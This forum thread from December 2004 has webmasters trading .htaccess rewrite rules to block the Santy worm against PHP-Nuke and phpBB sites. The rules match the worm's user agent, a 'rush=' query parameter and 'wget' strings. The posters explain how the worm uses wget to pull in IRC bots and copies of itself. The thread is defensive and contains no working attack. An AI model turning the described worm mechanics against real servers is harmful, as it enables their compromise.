Santy Worm attach prevention - RECAP

VinDSL · Posted: Sun Dec 26, 2004 6:47 pm

Savent wrote:

Is the santy worm gone now? I haven't heard anything in the news about it, in like a week.

There are three documented (and easily accessible) Santy Worms in the wild right now:

Santy.a
Santy.b
Santy.c

...and more coming every day. The newest variants are using not only Google, but Yahoo/AOL for lookups, and they are attacking ALL .PHP scripts now, not just phpBB. I don't think the Santy Worm, et al, is going away any time soon.

VinDSL · Posted: Sun Dec 26, 2004 7:07 pm

Raven wrote:

We have so many good threads on this, I thought I'd recap...

Good idea!

Here are the directives I'm using now (slight tweak)...

Code:

#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]

I'm redirecting worms away from my site now, to a phantom URI. My 'emailsforyou' page is 10K, and it's getting hammered 'big time'. My thinking is, "Why waste any resources on these worms?" Wink

VinDSL · Posted: Sun Dec 26, 2004 10:01 pm

It's been determined that Santy.c does not have enough similarities with Santy, thus it was renamed from Santy.c/e to PhpInclude.Worm.

Raven · Posted: Sun Dec 26, 2004 10:03 pm

Great! I can't wait for the next one; can you?

VinDSL · Posted: Sun Dec 26, 2004 10:09 pm

It's been kinda fun, so far! Mr. Green

Raven · Posted: Sun Dec 26, 2004 10:25 pm

Himmel wrote:

Hehehe.. noproblem .. im the 1 who doesnt understand php Wink

So, did this fix your problem?

VinDSL · Posted: Mon Dec 27, 2004 12:01 am

You know, I've been playing around with 'this thing' all day, reading the boards, looking at the exploit[s], studying my logs, yada, yada... I had several ideas at the start, but none of them panned out, except for one.

For the life of me, I cannot see any reason to allow 'wget' command strings on my site. The only 'wget' entries in my logs (for the last month) were from Santy worms, and hackers trying to bust into Coppermine Photo Gallery.

I added a 'wget' string directive and ran several exploits against it. It caught them all and redirected.

Code:

#Check for Santy Worms and redirect them to a phantom site
#Variant-1
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant-2
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
#Variant-3
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
#Variant-4
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]

With these Santy worms, the 'wget' process is used to download helper apps such as an IRC client and additional copies of the worm itself to 'own' additional servers. The IRC client meets up with other 'zombie' servers, in a dedicated IRC channel, waiting for orders from the worm's author.

With this in mind, and anticipating additional variants, I didn't see any good reason to allow 'wget' command strings to be run against my Nuke site.

Then again, maybe I'm missing something... Cool

Raven · Posted: Mon Dec 27, 2004 5:00 am

Try using the file_get_contents() function with and without it. I know there are some backend procedures that use it, at least on my servers.

VinDSL · Posted: Mon Dec 27, 2004 6:50 am

Yep, 'file_get_contents' works just fine. I was looking around your site for something to use for a working example, when I ran across this:

Only registered users can see links on this board!
Get registered or login to the forums!

...I decided to have a 'Rolling Rock' instead...

manunkind · Posted: Mon Dec 27, 2004 9:56 am

I saw PcKiller mentioned and I remembered what it is/was. Is it not part of Sentinel anymore?

Himmel · Regular Joined: May 08, 2004 Posts: 77

Raven wrote:

Himmel wrote:

Hehehe.. noproblem .. im the 1 who doesnt understand php Wink

So, did this fix your problem?

Yep.. did receive only 2 mails after the fix... much better

Thx Wink

Raven · Posted: Mon Dec 27, 2004 10:39 am

manunkind wrote:

I saw PcKiller mentioned and I remembered what it is/was. Is it not part of Sentinel anymore?

We decided to make it an 'add-on', if you will. That way you can point to whatever response you want. You can still get it from Ganja's site, although nothing has changed.

CodyG · Posted: Mon Dec 27, 2004 11:46 am

Just wondering ... this applies to the .htaccess in the root nuke directory? ... or should it be applied to the .htaccess in the modules/Forums directory ??

Raven · Posted: Mon Dec 27, 2004 11:47 am

VinDSL wrote:

Yep, 'file_get_contents' works just fine. I was looking around your site for something to use for a working example, when I ran across this:

Only registered users can see links on this board!
Get registered or login to the forums!

...I decided to have a 'Rolling Rock' instead...

wget is used for things like updates to Fantastico and other cPanel things.

Raven · Posted: Mon Dec 27, 2004 11:49 am

CodyG wrote:

Just wondering ... this applies to the .htaccess in the root nuke directory? ... or should it be applied to the .htaccess in the modules/Forums directory ??

As long as it is in the root, it stops it before it goes anywhere else, unless you override it.

Muffin · Client Joined: Apr 10, 2004 Posts: 649 Location: UK

If the variants are now going after any php script on a server, can we put this rewrite code in the htaccess file in our root folder (if nuke is in a sub folder) and do we need to change permissions on the htaccess in this case to 666 or leave as is 644?

I already have this in my public_html root htaccess file tho, so do I replace this with the new code or what?

Quote:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://mydomain.com/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://mydomain.com$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.mydomain.com/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.mydomain.com$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.myotherdomain.co.uk/.*$ [NC]
RewriteCond %{HTTP_REFERER} !^http://www.myotherdomain.co.uk$ [NC]
RewriteRule .*\.(jpg|jpeg|gif|png|bmp)$

Only registered users can see links on this board!
Get registered or login to the forums!

[R,NC]

Or put the code maybe in any php root application folder htaccess file?

My nuke sites not in my root folder, but I have the code in my nuke root folder so I'm not getting any problems with it from there.

VinDSL · Posted: Mon Dec 27, 2004 6:28 pm

Raven wrote:

wget is used for things like updates to Fantastico and other cPanel things.

Agreed!

Now that the immediacy of the situation is over, I think it's time to start with the caveats...

Code:

#Place these directives at the TOP of your .htaccess file!
#Check for Santy Worms and redirect them to a PHANTOM site.
#Variant-1 May cause problems with CRON jobs set from cPanel.
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant-2 No reported problems.
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
#Variant-3 No reported problems.
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC,OR]
#Variant-4 May cause problems with cPanel updates, et cetera.
RewriteCond %{QUERY_STRING} ^(.*)wget(.*) [NC]
#Redirect - Send worms packing, but NOT to a real web site!
RewriteRule ^.*$ http://www.goawayanddontcomeback.com [L]

Raven · Posted: Mon Dec 27, 2004 7:26 pm

I chose another way ..... renamed wget.

VinDSL · Posted: Mon Dec 27, 2004 8:49 pm

Raven wrote:

I chose another way ..... renamed wget.

Yeah, this is all kinda ify'. Mileage may vary, depending on conditions. That's the nature of these things!

I think most Nuke sites are on shared servers, and ppl simply want to keep the worms away. CRON isn't in their vocabulary, and cPanel is updated by their web host.

I run my production site on a shared server because that's where the 'rubber meets the road', so to speak. I run 'personal' web sites, out of my living room, on a Slackware box that hasn't been touched in 2 years. I've run BSD, WiNNT IIS, and Redhat in the past. I'm currently embroiled in a VPS beta program that gives users root control over WHM/cPanel/Fedora. It shows great promise!

All of these situations would allow and even require different solutions, but I truly feel that the quick 'n' dirty fix, listed above, will work fine for most ppl in a shared server environment.

I wouldn't recommend something like this unless I was running it on my own production site, but then again, it probably isn't for everybody. That's certainly a given... Wink

Raven · Posted: Mon Dec 27, 2004 10:08 pm

I'm afraid it's getting to the point where our solutions will start limiting our exposure to both good and evil. It will be interesting to see what 2005 will bring in as far as viruses and exploits. But, y'all can rest assurred that we will be vigilant and hopefully, timely!

sixonetonoffun · Posted: Mon Dec 27, 2004 10:20 pm

2005 the year of the WoRm? Well the examples are out there and they are ridiculously simple. Its going to be business as usual around here I think...

TheosEleos · Posted: Tue Dec 28, 2004 10:54 pm

Here is what I have in my .htaccess...

Code:

#Check for Santy Worms and redirect them to a fake page
#Variant -1
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
#Variant -2
RewriteCond %{REQUEST_URI} ^visualcoders [NC,OR]
#Variant -3
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
RewriteRule ^.*$

Only registered users can see links on this board!
Get registered or login to the forums!

[L]

I'm a little lost though because I am looking at my error logs and there are a bunch that say this...

Quote:

[Tue Dec 28 16:00:02 2004] [error] [client 65.254.38.234] File does not exist: /home/blablabla/public_html/phenylshouse/www.uglypeople.com

Raven · Posted: Tue Dec 28, 2004 10:56 pm

You need

Only registered users can see links on this board!
Get registered or login to the forums!

TheosEleos · Posted: Tue Dec 28, 2004 11:11 pm

Ahhh, thank you.

I must have done this thing just in time. My log is full of these errors. Probably 40 or so. I never got one ban from Sentinel. I guess I set up htaccess right before the attacks started on my site.

TheosEleos · Posted: Tue Dec 28, 2004 11:17 pm

I don't know what I am talking about. because samspade says that ip is my dns or something...